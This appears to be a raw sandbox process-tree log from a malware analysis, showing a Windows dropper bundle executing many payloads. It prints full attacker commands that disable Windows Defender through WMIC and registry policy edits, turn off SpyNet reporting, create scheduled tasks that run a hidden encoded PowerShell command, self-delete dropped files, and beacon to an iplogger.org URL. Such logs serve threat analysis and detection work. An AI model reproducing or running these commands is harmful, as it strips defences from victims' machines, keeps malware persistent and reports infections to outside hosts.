C:\Users\Admin\AppData\Local\Temp\1kvw1dc2.fqj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\1kvw1dc2.fqj\GcleanerEU.exe /eufive10⤵PID:3748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cki4has4.cf1\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\cki4has4.cf1\installer.exeC:\Users\Admin\AppData\Local\Temp\cki4has4.cf1\installer.exe /qn CAMPAIGN="654"10⤵PID:7688
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cki4has4.cf1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cki4has4.cf1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632113453 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:9416
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zkuciary.sls\anyname.exe & exit9⤵PID:7956
-
C:\Users\Admin\AppData\Local\Temp\zkuciary.sls\anyname.exeC:\Users\Admin\AppData\Local\Temp\zkuciary.sls\anyname.exe10⤵PID:2260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dyhe2bcr.si4\gcleaner.exe /mixfive & exit9⤵PID:7280
-
C:\Users\Admin\AppData\Local\Temp\dyhe2bcr.si4\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\dyhe2bcr.si4\gcleaner.exe /mixfive10⤵PID:7740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0e-3799d-606-768be-1896da184bf5a\Bifuwahysha.exe"C:\Users\Admin\AppData\Local\Temp\0e-3799d-606-768be-1896da184bf5a\Bifuwahysha.exe"8⤵PID:6364
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 20969⤵PID:5364
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1660
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe1⤵
- Executes dropped EXE
PID:3996 -
C:\Users\Admin\Documents\IqRSc8xznfHsI2OZY58Bdgsp.exe"C:\Users\Admin\Documents\IqRSc8xznfHsI2OZY58Bdgsp.exe"2⤵PID:3008
-
-
C:\Users\Admin\Documents\l9VDavdKfR7aSPez8NlNpE4O.exe"C:\Users\Admin\Documents\l9VDavdKfR7aSPez8NlNpE4O.exe"2⤵PID:5320
-
-
C:\Users\Admin\Documents\cG8QRiH1TOA22HibxG9862sE.exe"C:\Users\Admin\Documents\cG8QRiH1TOA22HibxG9862sE.exe"2⤵PID:5596
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im cG8QRiH1TOA22HibxG9862sE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\cG8QRiH1TOA22HibxG9862sE.exe" & del C:\ProgramData\*.dll & exit3⤵PID:7636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im cG8QRiH1TOA22HibxG9862sE.exe /f4⤵
- Kills process with taskkill
PID:8104
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:7944
-
-
-
-
C:\Users\Admin\Documents\q25w_xfNBtBbgtV1u0awYQ3x.exe"C:\Users\Admin\Documents\q25w_xfNBtBbgtV1u0awYQ3x.exe"2⤵PID:5512
-
-
C:\Users\Admin\Documents\E3vbxcTTjQ5eNHlR9FZJWTCx.exe"C:\Users\Admin\Documents\E3vbxcTTjQ5eNHlR9FZJWTCx.exe"2⤵PID:5696
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:7180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:7172
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"3⤵PID:6188
-
C:\Users\Admin\Documents\2RLGRsMOUYb3fknUkXnIbJUq.exe"C:\Users\Admin\Documents\2RLGRsMOUYb3fknUkXnIbJUq.exe"4⤵PID:2288
-
-
C:\Users\Admin\Documents\azWb42N0wtqN16pF24p72gj6.exe"C:\Users\Admin\Documents\azWb42N0wtqN16pF24p72gj6.exe" /mixtwo4⤵PID:7924
-
-
C:\Users\Admin\Documents\N1BsuAkNp4WZwVR100bSWvMF.exe"C:\Users\Admin\Documents\N1BsuAkNp4WZwVR100bSWvMF.exe"4⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\7zS3CA3.tmp\Install.exe.\Install.exe5⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\7zS4492.tmp\Install.exe.\Install.exe /S /site_id "668658"6⤵PID:5872
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3520 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:7520
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:6932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:8456
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:8328
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:7992
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:8356
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:8444
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:8800
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:7252
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:8300
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:8380
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:8620
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRSPnaGAA" /SC once /ST 03:37:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:8392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRSPnaGAA"7⤵PID:8720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRSPnaGAA"7⤵PID:9032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 04:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\LGLXNzn.exe\" W8 /site_id 668658 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:5920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bRciptYQhTCMvEFWGJ"7⤵PID:5552
-
-
-
-
-
C:\Users\Admin\Documents\va0NN7AEjIq5EYpsCe659M2a.exe"C:\Users\Admin\Documents\va0NN7AEjIq5EYpsCe659M2a.exe"4⤵PID:7992
-
-
C:\Users\Admin\Documents\ELxSWH1Gjme6fe9g1InQdXSP.exe"C:\Users\Admin\Documents\ELxSWH1Gjme6fe9g1InQdXSP.exe"4⤵PID:8164
-
-
-
-
C:\Users\Admin\Documents\cEn4V9p4CmcX1hsJlum5kovJ.exe"C:\Users\Admin\Documents\cEn4V9p4CmcX1hsJlum5kovJ.exe"2⤵PID:1016
-
-
C:\Users\Admin\Documents\fQH6aYQwXwSETFgq7vhe2h7h.exe"C:\Users\Admin\Documents\fQH6aYQwXwSETFgq7vhe2h7h.exe"2⤵PID:3084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "fQH6aYQwXwSETFgq7vhe2h7h.exe" /f & erase "C:\Users\Admin\Documents\fQH6aYQwXwSETFgq7vhe2h7h.exe" & exit3⤵PID:7824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "fQH6aYQwXwSETFgq7vhe2h7h.exe" /f4⤵
- Kills process with taskkill
PID:4820
-
-
-
-
C:\Users\Admin\Documents\OqBFqQ0r6mVOfD3ywWJ2VwFk.exe"C:\Users\Admin\Documents\OqBFqQ0r6mVOfD3ywWJ2VwFk.exe"2⤵PID:6132
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"3⤵PID:6744
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵PID:6680
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"3⤵PID:6672
-
-
-
C:\Users\Admin\Documents\JDvaKt7DVq6alj1A47jDafj_.exe"C:\Users\Admin\Documents\JDvaKt7DVq6alj1A47jDafj_.exe"2⤵PID:6176
-
-
C:\Users\Admin\Documents\EWAhSbi4zxlMVtMFIPfEwK4O.exe"C:\Users\Admin\Documents\EWAhSbi4zxlMVtMFIPfEwK4O.exe"2⤵PID:6304
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"3⤵PID:6648
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"4⤵PID:6336
-
C:\Users\Admin\AppData\Local\237843444.exe"C:\Users\Admin\AppData\Local\237843444.exe"5⤵PID:7816
-
-
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"4⤵PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"4⤵PID:6312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"4⤵PID:6772
-
-
-
-
C:\Users\Admin\Documents\20CVVK70H7CO2D41vcW5_AcD.exe"C:\Users\Admin\Documents\20CVVK70H7CO2D41vcW5_AcD.exe"2⤵PID:6396
-
-
C:\Users\Admin\Documents\6sYWN3i8rMmyUPZC1aQ6tRxi.exe"C:\Users\Admin\Documents\6sYWN3i8rMmyUPZC1aQ6tRxi.exe"2⤵PID:6484
-
C:\Users\Admin\Documents\6sYWN3i8rMmyUPZC1aQ6tRxi.exeC:\Users\Admin\Documents\6sYWN3i8rMmyUPZC1aQ6tRxi.exe3⤵PID:3172
-
-
-
C:\Users\Admin\Documents\BLXW6bHji02uJJuARb_bro1S.exe"C:\Users\Admin\Documents\BLXW6bHji02uJJuARb_bro1S.exe"2⤵PID:6664
-
-
C:\Users\Admin\Documents\5Wo64FObIqbX7tXK2zvQOiun.exe"C:\Users\Admin\Documents\5Wo64FObIqbX7tXK2zvQOiun.exe"2⤵PID:6628
-
-
C:\Users\Admin\Documents\knwLfVfEOawhLQBSSKGzRRsd.exe"C:\Users\Admin\Documents\knwLfVfEOawhLQBSSKGzRRsd.exe"2⤵PID:1332
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\knwLfVfEOawhLQBSSKGzRRsd.exe"3⤵PID:7764
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:7544
-
-
-
-
C:\Users\Admin\Documents\nvWVuvGjbyrtxm9yA5HIhDhd.exe"C:\Users\Admin\Documents\nvWVuvGjbyrtxm9yA5HIhDhd.exe"2⤵PID:4428
-
C:\Users\Admin\Documents\nvWVuvGjbyrtxm9yA5HIhDhd.exe"C:\Users\Admin\Documents\nvWVuvGjbyrtxm9yA5HIhDhd.exe"3⤵PID:4488
-
-
-
C:\Users\Admin\Documents\Bj3hySrk5UWL119oRhNFYs6i.exe"C:\Users\Admin\Documents\Bj3hySrk5UWL119oRhNFYs6i.exe"2⤵PID:6260
-
C:\Users\Admin\Documents\Bj3hySrk5UWL119oRhNFYs6i.exeC:\Users\Admin\Documents\Bj3hySrk5UWL119oRhNFYs6i.exe3⤵PID:6564
-
-
-
C:\Users\Admin\Documents\qVBtAUuQpaRbxHnblllcpVQ3.exe"C:\Users\Admin\Documents\qVBtAUuQpaRbxHnblllcpVQ3.exe"2⤵PID:4332
-
C:\Users\Admin\AppData\Roaming\2759627.scr"C:\Users\Admin\AppData\Roaming\2759627.scr" /S3⤵PID:8052
-
-
C:\Users\Admin\AppData\Roaming\3580210.scr"C:\Users\Admin\AppData\Roaming\3580210.scr" /S3⤵PID:2728
-
-
C:\Users\Admin\AppData\Roaming\4375004.scr"C:\Users\Admin\AppData\Roaming\4375004.scr" /S3⤵PID:7652
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe1⤵
- Executes dropped EXE
PID:3312
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3432 -
C:\Users\Admin\AppData\Roaming\4023353.scr"C:\Users\Admin\AppData\Roaming\4023353.scr" /S2⤵PID:4416
-
-
C:\Users\Admin\AppData\Roaming\8717366.scr"C:\Users\Admin\AppData\Roaming\8717366.scr" /S2⤵PID:4824
-
-
C:\Users\Admin\AppData\Roaming\4818147.scr"C:\Users\Admin\AppData\Roaming\4818147.scr" /S2⤵PID:4956
-
C:\Users\Admin\AppData\Roaming\4818147.scr"C:\Users\Admin\AppData\Roaming\4818147.scr"3⤵PID:4964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 8923⤵
- Program crash
PID:2528
-
-
-
C:\Users\Admin\AppData\Roaming\3300990.scr"C:\Users\Admin\AppData\Roaming\3300990.scr" /S2⤵PID:1692
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"1⤵PID:5856
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5048
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4580 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:8932
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7312
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 05574CA72BFB8C12DDD6C66D2275863F C2⤵PID:8892
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CDFAEEAB7D6CAB6A0DBB1D0F5331F2312⤵PID:9720
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:9884
-
-
-
C:\Users\Admin\AppData\Local\Temp\4856.exeC:\Users\Admin\AppData\Local\Temp\4856.exe1⤵PID:8852
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\LGLXNzn.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\LGLXNzn.exe W8 /site_id 668658 /S1⤵PID:9164
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:7104
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:7368
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:9000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:8372
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:8904
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵PID:7432
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:8784
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:796
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:8464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:8312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:8636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:7128
-
-
